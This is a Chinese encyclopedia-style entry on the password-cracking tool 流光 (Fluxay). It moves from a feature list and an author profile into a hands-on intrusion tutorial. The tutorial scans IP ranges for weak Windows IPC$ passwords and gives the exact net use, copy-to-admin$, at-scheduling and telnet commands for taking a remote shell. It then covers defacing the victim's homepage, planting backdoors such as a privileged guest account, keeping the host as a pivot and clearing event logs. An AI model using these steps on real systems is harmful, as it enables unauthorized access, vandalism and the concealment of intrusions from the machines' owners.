流光(軟體名稱)

流光是一款軟體。用於檢測POP3/FTP主機中用戶密碼安全漏洞

簡介,IPC定義,

簡介

界面豪華,功能強大!功能簡介如下:1、用於檢測POP3/FTP主機中用戶密碼安全漏洞。2、163/169雙通。3、多執行緒檢測,消除系統中密碼漏洞。4、高效的用戶流模式。5、高效伺服器流模式,可同時對多台POP3/FTP主機進行檢測。6、最多500個執行緒探測。7、執行緒逾時設定,阻塞執行緒具有自殺功能,不會影響其他執行緒。8、支持10個字典同時檢測。9、檢測設定可作為項目保存。10、取消了國內IP限制而且免費。
流光4.7新增功能:
1、加入了本地模式,在本機運行是不必安裝Sensor。
2、Sensor掃描臨時結果檔案(*.PTR)的尺寸大約減少了10倍。
3、後台掃描模式時,掃描的結果(*.PTR)可以直接通過附屬檔案傳送到信箱。
4、Sensor的掃描速度加快。
5、減少了Sensor異常退出的BUG。
6、流光的界面和Sensor之間的通訊採用Triple-DES,密鑰的長度最多可到192bits,保證整個傳輸過程不可監聽。掃描的結果也只有在密鑰正確的情況下才可閱讀。
7、修正的控制服務,新的控制服務在升級Sensor時不再會失敗。
8、Sensor的服務名稱可以任意指定,控制服務和Sensor的進程名稱也可以任意指定。
9、支持XP(本地模式),很快會有98/ME的版本。
簡介
網名:
婚姻:已婚
資歷:中國CAD/CAM協會會員,高級程式設計師
格言:無論在現實或是網路中,我都是孤獨的……
黑客原則:不能仇視社會,不能給別人製造麻煩,不能給別人帶來損失。
作者有權刪除此文章

IPC定義

IPC是指"InterProcess Communications",準確的說是ipc$,是默認的在系統啟動時的admin共享。
流光流光
IPC$是Windows NT/2K中特有的遠程網路登入功能,它的特點是在同一時間內,兩個IP之間只允許建立一個連線。
注意,你試圖通過IPC$連線會在EventLog中留下記錄。不管你是否登錄成功。
可不可以通過IPC$暴力破解密碼?當然可以 ! 不過,是不是太笨了點 …
2、首次啟動流光,會看到註冊的畫面,具體操作請參考本人第一篇教程。我們在主頁面上可以有幾種方法來通過IPC 探測獲得管理的許可權。這裡我們要作的是得到一台跳板,那么就可以用命中率高的辦法來探測了(測試一堆IP來得到弱口令)。
在主界面選擇 探測→探測POP3/FTP/NT/SQL主機選項,或者直接按Ctrl+R。
3、出先了上面的小視窗,輸入我們要破解的IP段,我們輸入了來看看。圖main2我們把“將FrontPage主機自動加入HTTP主機列表取消了”。因為我們只想獲得IPC弱口令,這樣可以加快掃描的速度 :)填入IP,選擇掃描NT/98主機
4、探測中……
(注意如果你要探測的是流光保留的國內的IP段,會被禁止的,也就是探測的時候信息欄出現"IP保留"的字樣)
有遠程主機的管理密碼了,我們剩下的就是想辦法控制它了,有什麼好辦么? :)有的是 !自己看看工具-選單下的IIS遠程命令:)是不是很簡單呢,我以後在說,今天還是先練習net 命令吧。
黑了他 !
開個dos prompt 執行如下命令,本次用的例子如下圖。
1、 net use \\對方ip\ipc$ "密碼" /user:"用戶名" || 建立遠程連線
2、 copy icmd.exe \\對方ip\admin$ || admin$是對方的winnt目錄 :) 這裡檔案多。
3、 net time \\對方IP || 看看對方的本地時間
4、at \\對方ip 啟動程式的時間 啟動程式名 啟動程式的參數 || 用at命令來定時啟動程式,在這裡我們用soon這個程式來做也可以,它可以取代 3/4兩步。
5、 telnet 對方ip 連線埠 ||
6、輸入pass (如果不是用icmd.exe,或者沒有設定口令就不用了) ||
7、在開個視窗,繼續copy 我們用的東西。 copy sock.exe copy ntlm.exe copy cl.exe clear.exe
如果我們真的想黑了他,只需要把我們的首頁檔案覆蓋目標的首頁就ok了,我們可以通過dir /s default.htm或者dir /s index.htm 來確定對方首頁的為止,一般是在X:\interpub\wwwroot\ .
假如首頁檔案是default.htm並且在c:\interpub\wwwroot,這樣:copy default.htm \\ip\c$\interpub\wwwroot
下面的圖有演示
8、其實黑人家是很低級並且沒意思的:(,我們最好是物有所有,作成跳板吧,今後幹活方便點:
執行我們copy 過去的ntlm.exe ,取消驗正。在給自己留個後門,比如提升guest的許可權,或者其它的後門工具,這類東西多了自己選吧,看看殺手copy的那堆東西 :)
9、還能做成其他的么 ?
當然了,只要你有時間,並且願意做,我曾經偷偷的把自己的主頁放到人家的server上,速度快、空間無限,嘿嘿 :)
10、日誌清除,下線 :
執行我們copy 過去的cl.exe clear.exe 都可以清除日誌,比如clear all :清除所有的日誌。然後在下線:net use \\ip\ipc$ /delete

相關詞條

熱門詞條

聯絡我們